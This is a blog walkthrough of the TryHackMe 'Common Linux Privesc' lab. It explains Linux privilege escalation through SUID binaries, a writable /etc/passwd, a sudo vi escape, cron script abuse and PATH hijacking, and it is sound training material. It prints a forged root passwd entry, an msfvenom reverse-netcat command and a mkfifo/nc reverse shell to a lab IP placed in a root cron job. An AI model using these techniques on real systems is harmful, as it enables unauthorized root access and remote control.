Common Linux Privesc TryHackme Writeup
By Shamsher khan This is a Writeup of Tryhackme room “Common Linux Privesc”
Room link: https://tryhackme.com/room/commonlinuxprivesc
Note: This room is for Premium Members Only. who purchased THM premium membership.
Hello and welcome!
This room will explore common Linux Privilege Escalation vulnerabilities and techniques, but in order to do that, we’ll need to do a few things first!
A basic knowledge of Linux, and how to navigate the Linux file system, is required for this room. If you think you’ll need some help with this, try completing the ‘Learn Linux’ room (https://tryhackme.com/room/zthlinux)
- Deploy the machine
- Connect to the TryHackMe OpenVPN Server (See https://tryhackme.com/access for help!)
- Make sure you’re sitting comfortably, and have a cup of Tea, Coffee or Water close!
This Beginner-friendly walkthrough is based on TryHackMe platform room “Common Linux Privilege Escalation”. In this walkthrough, we are going to deep dive into some of the common Linux privilege escalation techniques that will come handy during a penetration test.
Prerequisites
Although the room has a detailed explanation of each topic, beforehand knowledge will let you understand the concepts more easily and clearly
- Understanding of SSH, listing, copying, and writing of files
- Basic Understanding of Linux Files System, file permissions, etc
Task 2. Understanding Privesc
What does “privilege escalation” mean?
At it’s core, Privilege Escalation usually involves going from a lower permission to a higher permission. More technically, it’s the exploitation of a vulnerability, design flaw or configuration oversight in an operating system or application to gain unauthorized access to resources that are usually restricted from the users.
Why is it important?
Rarely when doing a CTF or real-world penetration test, will you be able to gain a foothold (initial access) that affords you administrator access. Privilege escalation is crucial, because it lets you gain system administrator levels of access. This allow you to do many things, including:
- Reset passwords
- Bypass access controls to compromise protected data
- Edit software configurations
- Enable persistence, so you can access the machine again later.
- Change privilege of users
- Get that cheeky root flag ;)
As well as any other administrator or super user commands that you desire.
Task 3. Direction of Privilege Escalation
Privilege Tree:
There are two main privilege escalation variants:
Horizontal privilege escalation: This is where you expand your reach over the compromised system by taking over a different user who is on the same privilege level as you. For instance, a normal user hijacking another normal user (rather than elevating to super user). This allows you to inherit whatever files and access that user has. This can be used, for example, to gain access to another normal privilege user, that happens to have an SUID file attached to their home directory (more on these later) which can then be used to get super user access. [Travel sideways on the tree]
Vertical privilege escalation (privilege elevation): This is where you attempt to gain higher privileges or access, with an existing account that you have already compromised. For local privilege escalation attacks this might mean hijacking an account with administrator privileges or root privileges. [Travel up on the tree]
Task 4. Enumeration
What is LinEnum?
LinEnum is a simple bash script that performs common commands related to privilege escalation, saving time and allowing more effort to be put toward getting root. It is important to understand what commands LinEnum executes, so that you are able to manually enumerate privesc vulnerabilities in a situation where you’re unable to use LinEnum or other like scripts. In this room, we will explain what LinEnum is showing, and what commands can be used to replicate it.
Where to get LinEnum
You can download a local copy of LinEnum from:
https://github.com/rebootuser/LinEnum/blob/master/LinEnum.sh
It’s worth keeping this somewhere you’ll remember, because LinEnum is an invaluable tool.
How do I get LinEnum on the target machine?
There are two ways to get LinEnum on the target machine. The first way, is to go to the directory that you have your local copy of LinEnum stored in, and start a Python web server using “python3 -m http.server 8000” [1]. Then using “wget” on the target machine, and your local IP, you can grab the file from your local machine [2]. Then make the file executable using the command “chmod +x FILENAME.sh”.
https://raw.githubusercontent.com/rebootuser/LinEnum/master/LinEnum.shFirst, lets SSH into the target machine, using the credentials user3:password. This is to simulate getting a foothold on the system as a normal privilege user.
ssh user3@10.10.41.139
What is the target’s hostname?
Answer: polobox
Look at the output of /etc/passwd how many “user[x]” are there on the system?
cat /etc/passwd
Answer: 8
Question 3. How many available shells are there on the system?
Answer: 4
Question 4. What is the name of the bash script that is set to run every 5 minutes by cron?
Answer: autoscript.sh
Question 5. What critical file has had its permissions changed to allow some users to write to it?
Answer: /etc/passwd
Task 5: Abusing SUID/GUID Files
Finding and Exploiting SUID Files
The first step in Linux privilege escalation exploitation is to check for files with the SUID/GUID bit set. This means that the file or files can be run with the permissions of the file(s) owner/group. In this case, as the super-user. We can leverage this to get a shell with these privileges!
What is an SUID binary?
As we all know in Linux everything is a file, including directories and devices which have permissions to allow or restrict three operations i.e. read/write/execute. So when you set permission for any file, you should be aware of the Linux users to whom you allow or restrict all three permissions. Take a look at the following demonstration of how maximum privileges (rwx-rwx-rwx) look:
r = read
w = write
x = execute
user group others
rwx rwx rwx
421 421 421
The maximum number of bit that can be used to set permission for each user is 7, which is a combination of read (4) write (2) and execute (1) operation. For example, if you set permissions using “chmod” as 755, then it will be: rwxr-xr-x.
But when special permission is given to each user it becomes SUID or SGID. When extra bit “4” is set to user(Owner) it becomes SUID (Set user ID) and when bit “2” is set to group it becomes SGID (Set Group ID).
Therefore, the permissions to look for when looking for SUID is:
SUID:
rws-rwx-rwx
GUID:
rwx-rws-rwx
Finding SUID Binaries
We already know that there is SUID capable files on the system, thanks to our LinEnum scan. However, if we want to do this manually we can use the command: “find / -perm -u=s -type f 2>/dev/null” to search the file system for SUID/GUID files. Let’s break down this command.
find = Initiates the “find” command
/ = Searches the whole file system
-perm = searches for files with specific permissions
-u=s = Any of the permission bits mode are set for the file. Symbolic modes are accepted in this form
-type f = Only search for files
2>/dev/null — Suppresses errors
Question 1. What is the path of the file in user3’s directory that stands out to you?
Answer: /home/user3/shell
Task 6. Exploiting Writeable /etc/passwd
Using the LinEnum we found that user7 has writable permission to /etc/passwd file which means the user can make changes to the files. The passwd file contains the password hashes of the users created on the system.
Next, we need to switch to the user7 using the password “password”
Question 1. Having read the information above, what direction privilege escalation is this attack?
Answer: vertical
Question 2. Before we add our new user, we first need to create a compliant password hash to add! We do this by using the command: “openssl passwd -1 -salt [salt] [password]”. What is the hash created by using this command with the salt, “new” and the password “123”?
Question 3. Great! Now we need to take this value, and create a new root user account. What would the /etc/passwd entry look like for a root user with the username “new” and the password hash we created before?
new:$1$new$p7ptkEKU1HnaHpRtzNizS1:0:0:root:/root:/bin/bash
Let’s switch to our new user using the password we set before. As soon as we switch to the new user we are prompted with a superuser banner as seen below
Task 7. Escaping Vi Editor
Sudo -l
This exploit comes down to how effective our user account enumeration has been. Every time you have access to an account during a CTF scenario, you should use “sudo -l” to list what commands you’re able to use as a super user on that account. Sometimes, like this, you’ll find that you’re able to run certain commands as a root user without the root password. This can enable you to escalate privileges.
Escaping Vi
Running this command on the “user8” account shows us that this user can run vi with root privileges. This will allow us to escape vim in order to escalate privileges and get a shell as the root user!
Misconfigured Binaries and GTFOBins
If you find a misconfigured binary during your enumeration, or when you check what binaries a user account you have access to can access, a good place to look up how to exploit them is GTFOBins. GTFOBins is a curated list of Unix binaries that can be exploited by an attacker to bypass local security restrictions. It provides a really useful breakdown of how to exploit a misconfigured binary and is the first place you should look if you find one on a CTF or Pentest.
First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user8, with the password “password”
Question 1. Let’s use the “sudo -l” command, what does this user require (or not require) to run vi as root?
Answer: NOPASSWD
all we need to do is open vi as root, by typing “sudo vi” into the terminal.
Now, type “:!sh” to open a shell!
Press Enter to get your root shell
Task 8: Exploiting Crontab
What is Cron?
The Cron daemon is a long-running process that executes commands at specific dates and times. You can use this to schedule activities, either as one-time events or as recurring tasks. You can create a crontab file containing commands and instructions for the Cron daemon to execute.
How to view what Cronjobs are active.
We can use the command “cat /etc/crontab” to view what cron jobs are scheduled. This is something you should always check manually whenever you get a chance, especially if LinEnum, or a similar script, doesn’t find anything.
Format of a Cronjob
Cronjobs exist in a certain format, being able to read that format is important if you want to exploit a cron job.
# = ID
m = Minute
h = Hour
dom = Day of the month
mon = Month
dow = Day of the week
user = What user the command will run as
command = What command should be run
For Example,
# m h dom mon dow user command
17 * 1 * * * root cd / && run-parts — report /etc/cron.hourly
How can we exploit this?
We know from our LinEnum scan, that the file autoscript.sh, on user4’s Desktop is scheduled to run every five minutes. It is owned by root, meaning that it will run with root privileges, despite the fact that we can write to this file. The task then is to create a command that will return a shell and paste it in this file. When the file runs again in five minutes the shell will be running as root.
Let’s do it!
First, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user4, with the password “password”
When I exited, I got thrown back in to Vi. To get out, press Esc then type :q! to get back to user8.
Question 1. What is the flag to specify a payload in msfvenom?
Answer: -p
Create a payload using: “msfvenom -p cmd/unix/reverse_netcat lhost=LOCALIP lport=8888 R”
Question 1. What directory is the “autoscript.sh” under?
Answer: /home/user4/Desktop
Lets replace the contents of the file with our payload using:
echo "mkfifo /tmp/nskmcox; nc 10.2.12.26 4444 0</tmp/nskmcox | /bin/sh >/tmp/nskmcox 2>&1; rm /tmp/nskmcox" > autoscript.sh
After copying the code into autoscript.sh file we wait for cron to execute the file, and start our netcat listener using: “nc -lvp 8888” and wait for our shell to land!
After about 5 minutes, you should have a shell as root land in your netcat listening session! Congratulations!
Get TTy shell
script -qc /bin/bash /dev/null
Task 9: Exploiting PATH Variable
Going back to our local ssh session, not the netcat root session, you can close that now, let’s exit out of root from our previous task by typing “exit”. Then use “su” to swap to user5, with the password “password”
What is PATH?
PATH is an environmental variable in Linux and Unix-like operating systems which specifies directories that hold executable programs. When the user runs any command in the terminal, it searches for executable files with the help of the PATH Variable in response to commands executed by a user.
It is very simple to view the Path of the relevant user with help of the command “echo $PATH”.
How does this let us escalate privileges?
Let’s say we have an SUID binary. Running it, we can see that it’s calling the system shell to do a basic process like list processes with “ps”. Unlike in our previous SUID example, in this situation we can’t exploit it by supplying an argument for command injection, so what can we do to try and exploit this?
We can re-write the PATH variable to a location of our choosing! So when the SUID binary calls the system shell to run an executable, it runs one that we’ve written instead!
As with any SUID file, it will run this command with the same privileges as the owner of the SUID file! If this is root, using this method we can run whatever commands we like as root!
Question 1. Let’s go to user5’s home directory, and run the file “script”. What command do we think that it’s executing?
Answer: ls
Now we know what command to imitate, let’s change directory to “tmp”.
Now we need to change the path variable as shown below. As soon as we run the ls command, it will take us to the root shel
Now, change directory back to user5’s home directory.
Now, run the “script” file again, you should be sent into a root bash prompt!
Congratulations!
I hope you enjoyed this writeup. Remember to practice the tools and techniques you learned during this walkthrough to reinforce your knowledge. Till then Happy Hacking ;)
Resource & Material
Below is a list of good checklists to apply to CTF or penetration test use cases.Although I encourage you to make your own using CherryTree or whatever notes application you prefer.
- https://github.com/netbiosX/Checklists/blob/master/Linux-Privilege-Escalation.md
- https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Linux%20-%20Privilege%20Escalation.md
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_-_linux.html
- https://payatu.com/guide-linux-privilege-escalation
You can find me on:
LinkedIn:- https://www.linkedin.com/in/shamsher-khan-651a35162/
Twitter:- https://twitter.com/shamsherkhannn
Tryhackme:- https://tryhackme.com/p/Shamsher
For more walkthroughs stay tuned…
Before you go…
Visit my other walkthrough’s:-
and thank you for taking the time to read my walkthrough.
If you found it helpful, please hit the 👏 button 👏 (up to 40x) and share
it to help others with similar interests! + Feedback is always welcome!
